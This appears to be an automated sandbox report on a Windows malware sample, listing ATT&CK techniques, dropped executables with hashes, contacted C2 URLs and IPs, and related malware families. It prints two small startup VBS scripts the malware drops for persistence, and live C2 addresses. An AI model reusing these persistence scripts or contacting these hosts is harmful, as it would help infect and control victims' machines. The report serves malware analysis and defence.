Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_000B1204
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_000B1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	1 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	21 Access Token Manipulation	1 Software Packing	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	412 Process Injection	1 DLL Side-Loading	LSA Secrets	431 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9876567899.bat.exe	29%	Virustotal		Browse
9876567899.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\preinhered\palladiums.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Dhy2kmz.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Wnuth.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\preinhered\palladiums.exe	29%	ReversingLabs

Source	Detection	Scanner	Label
https://oshi.at/BLZu	0%	Avira URL Cloud	safe
http://172.245.123.11/tpm/fre.php	100%	Avira URL Cloud	malware
https://oshi.at/rtBS?N	0%	Avira URL Cloud	safe
https://oshi.at/BLZuM	0%	Avira URL Cloud	safe
https://oshi.at/rtBS	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
oshi.at	194.15.112.248	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://oshi.at/BLZu	true	Avira URL Cloud: safe	unknown
http://172.245.123.11/tpm/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
https://oshi.at/rtBS?N	true	Avira URL Cloud: safe	unknown
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	false		high
https://oshi.at/rtBS	svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	palladiums.exe, palladiums.exe, 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	false		high
https://oshi.at/BLZuM	Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000000.2085021308.0000000000542000.00000002.00000001.01000000.00000007.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	false		high
https://oshi.at	Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.15.112.248	oshi.at	Ukraine		213354	INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB	false
172.245.123.11	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585229
Start date and time:	2025-01-07 11:01:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9876567899.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@99/9@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 47 Number of non-executed functions: 306
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:01:57	API Interceptor	171x Sleep call for process: svchost.exe modified
05:02:00	API Interceptor	36x Sleep call for process: Dhy2kmz.exe modified
11:01:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs
11:02:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.15.112.248	Ref_31020563.exe	Get hash	malicious	Unknown	Browse
	Ref#116670.exe	Get hash	malicious	MassLogger RAT	Browse
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse
	Ref#1550238.exe	Get hash	malicious	AgentTesla	Browse
	KyrazonSetup.exe	Get hash	malicious	Unknown	Browse
	KyrazonSetup.exe	Get hash	malicious	Unknown	Browse
	Order._1.exe	Get hash	malicious	AsyncRAT, Babadeda, PureLog Stealer, zgRAT	Browse
	uVQLD8YVk6.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse
	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse
172.245.123.11	e2VMPAayU1.rtf	Get hash	malicious	Unknown	Browse	172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
	Purchase Order.xls	Get hash	malicious	Unknown	Browse	172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
	4vzwJTZbwT.rtf	Get hash	malicious	Remcos	Browse	172.245.123.11/47/BEN.txt
	PI-002312.xls	Get hash	malicious	Remcos	Browse	172.245.123.11/47/BEN.txt
	BilseMHALF.rtf	Get hash	malicious	Unknown	Browse	172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIF

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
oshi.at	Ref#66001032.exe	Get hash	malicious	AgentTesla	Browse	5.253.86.15
	Ref#20203216.exe	Get hash	malicious	AgentTesla	Browse	5.253.86.15
	Ref_31020563.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	Ref_31020563.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Ref#116670.exe	Get hash	malicious	MassLogger RAT	Browse	194.15.112.248
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	Ref#1550238.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	Ref#1550238.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Swift Payment MT103.lnk	Get hash	malicious	Unknown	Browse	188.241.120.6
	Facturation.exe	Get hash	malicious	Doenerium	Browse	188.241.120.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB	Ref_31020563.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	Ref#116670.exe	Get hash	malicious	MassLogger RAT	Browse	194.15.112.248
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	Ref#1550238.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	KyrazonSetup.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	KyrazonSetup.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	Order._1.exe	Get hash	malicious	AsyncRAT, Babadeda, PureLog Stealer, zgRAT	Browse	194.15.112.248
	uVQLD8YVk6.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	194.15.112.248
	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	194.15.112.248
	1pXdiCesZ6.exe	Get hash	malicious	DanaBot	Browse	194.15.112.203
AS-COLOCROSSINGUS	arm5.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mips.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mpsl.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	sh4.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	powerpc.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	sparc.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	m68k.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i686.elf	Get hash	malicious	Unknown	Browse	107.175.130.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse	194.15.112.248
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	c2.hta	Get hash	malicious	Remcos	Browse	194.15.112.248
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	ZipThis.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	194.15.112.248
	https://sendbot.me/mousse-w0fysl7	Get hash	malicious	Unknown	Browse	194.15.112.248
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	194.15.112.248
	anrek.mp4.hta	Get hash	malicious	LummaC Stealer	Browse	194.15.112.248
37f463bf4616ecd445d4a1937da06e19	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	c2.hta	Get hash	malicious	Remcos	Browse	194.15.112.248
	H565rymIuO.doc	Get hash	malicious	Unknown	Browse	194.15.112.248
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse	194.15.112.248
	287438657364-7643738421.08.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	u1XWB0BIju.msi	Get hash	malicious	Unknown	Browse	194.15.112.248
	setup.msi	Get hash	malicious	Unknown	Browse	194.15.112.248
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	194.15.112.248
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	194.15.112.248

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57976
Entropy (8bit):	6.2713364951546815
Encrypted:	false
SSDEEP:	1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
MD5:	CDD3D1BB178C391A905C40D2B292F4D6
SHA1:	BF7FCE373510E8FAC054703F879C5AAC2E8ED584
SHA-256:	F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
SHA-512:	E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.\|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]..............................................................(......(....&.s....%(....(.....o....o....o........(.....s....%(.....o....u....r...po....o.......(.....0..=.......s...........(....(.....o....u....rM..p(..........o....o..........(.....0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.........(....@.%e..........Ft........'.\.........(....*.0..

C:\Users\user\AppData\Local\Temp\shrugged

Download File

Process:	C:\Users\user\Desktop\9876567899.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.49286719631285
Encrypted:	false
SSDEEP:	3072:N2ARMlPdCDy+IbsJiWfuzCa67Lk493P8cyJewSm+6:fRMlPdvsXfYCa67Lk41P8LJD/+6
MD5:	8C490D7318B04FEF5BCB3FFCF90F395F
SHA1:	FC07558EB7F4BA34A513E845AB83F741CF2E7279
SHA-256:	CB487810FE4D158B13BFB276C5800DE121417E31F9A47E7E141079F6DD87A2AC
SHA-512:	8EEF04C31A446D640A44EA0F28E0ECD49C2B3DCB56E9185ACA1554E1017D7BFC08932EDCD2598DFC271ED7B19E7B0782D8C6A6E88AB5206CE831EAA4B8E8819E
Malicious:	false
Preview:	...XHFXGS9FG..O9.N0IUGG6wOKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9.GTCA&.@0.\.f.6..x.#/+g'K) &"".!/^':3gTRo9,6k/6g.v.g9,+\lC=CqGG67OKY..>.../...U..X....Y.......A...M..T..{...!...N...Q......./..^... ......N.j....Y..\|....Q.e&(1..P.GW9FGTCOi.N0.TCG.?#.YXKFXGW9.GWBD8NN0qTGG.?OKYXK.aFW9VGTC.8BN0.UGW67OIYXNFYGW9FGQCN9BN0IUgM67KKYXKFXEW9.GTSO9RN0IUWG6'OKYXKFHGW9FGTCO9BN..TG#67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFX.V9.GTCO9BN0IUGG67OKYXKFXGW9FGTm;\::0IU.q77O[YXK~YGW=FGTCO9BN0IUGG6.OK9v9"9369F'.CO9.O0I.GG6.NKYXKFXGW9FGTC.9B..-43&67Oo.PKF.FW9DGTC18BN0IUGG67OKYX.FX.yAFGTCO9Bn0IUGM67oKYX.GXGW9FGTCO9BN0IUG.67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67

C:\Users\user\AppData\Local\preinhered\palladiums.exe

Download File

Process:	C:\Users\user\Desktop\9876567899.bat.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1176576
Entropy (8bit):	7.047932647192633
Encrypted:	false
SSDEEP:	24576:RqDEvCTbMWu7rQYlBQcBiT6rprG8ahmu9LHa7yyx:RTvC/MTQYxsWR7ahmiHaOy
MD5:	6D9798801523EE1C8C5DC83D28346814
SHA1:	66D6C6E65FFB8C635A286D68DE624EF5D469CF9B
SHA-256:	62E0FAC7C5231AA0D8D5F0FDB9E64D8BDADF79934A26577282B7AFFBC557A5FB
SHA-512:	9DFC24338CEE8DBBE830F4011D9B91FCAECBB861E75B19B9D28614F1D3B7D290DA4C1146251A09CB66B0B9872E7BF12C6899CA8090D1292CC0C11E2E0E700164
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....\|g.........."..........D......w.............@..........................P......`<....@...@.......@.....................d...\|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v...~..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57976
Entropy (8bit):	6.2713364951546815
Encrypted:	false
SSDEEP:	1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
MD5:	CDD3D1BB178C391A905C40D2B292F4D6
SHA1:	BF7FCE373510E8FAC054703F879C5AAC2E8ED584
SHA-256:	F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
SHA-512:	E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.\|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]..............................................................(......(....&.s....%(....(.....o....o....o........(.....s....%(.....o....u....r...po....o.......(.....0..=.......s...........(....(.....o....u....rM..p(..........o....o..........(.....0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.........(....@.%e..........Ft........'.\.........(....*.0..

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0D7DB7FF842F89A36B58FA2541DE2A6C
SHA1:	50F3B486F99FB22648D26870E7A5CBA01CAED3DA
SHA-256:	140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
SHA-512:	6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
Malicious:	false
Preview:	...............................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\Dhy2kmz.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.756456874631156
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoUkh4EaKC59fAIn:FER/lFHI9aZ59oI
MD5:	8028F309F7501839869CA60844BDD722
SHA1:	6113DF5DEFFE12D7C1265C1660F4F83D0788E0EC
SHA-256:	F7137F2CA35930385879FB80CBA99328C5B2A33E63B0D2BC5F4D3F0B2A25EA3A
SHA-512:	56976F28EC179A1BED23B8EDF95DC1AAA1939FDBADE16A2701CC142E801C717A14AAFE3E793ADF692B92662979D553B6528506AB9EB812C984B5D83A4B3F3E57
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Wnuth.exe"""

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Download File

Process:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.4111173001212505
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1GOnB70nkSMBnriIM8lfQVn:DsO+vNlzQ1R70npMRmA2n
MD5:	77E9EF8BEE8A9B0711F04E5DE06F8C0E
SHA1:	D0753A3722C014A82DD51F4BBEC0B9F94EC48624
SHA-256:	70A9A437059FC629BC5A0F342BD02762F177A57F22AA3C31C1B013D331BA5E93
SHA-512:	7A673833197B0127AF4592E015DBE3290A3E1F2B69E0F4E64AD6BA4574E224A25C04B09E1857B83F003F078312EFB9912B0E84A377C0329FAC25769B71BDECDB
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.r.e.i.n.h.e.r.e.d.\.p.a.l.l.a.d.i.u.m.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\Wnuth.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Dhy2kmz.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	57976
Entropy (8bit):	6.2713364951546815
Encrypted:	false
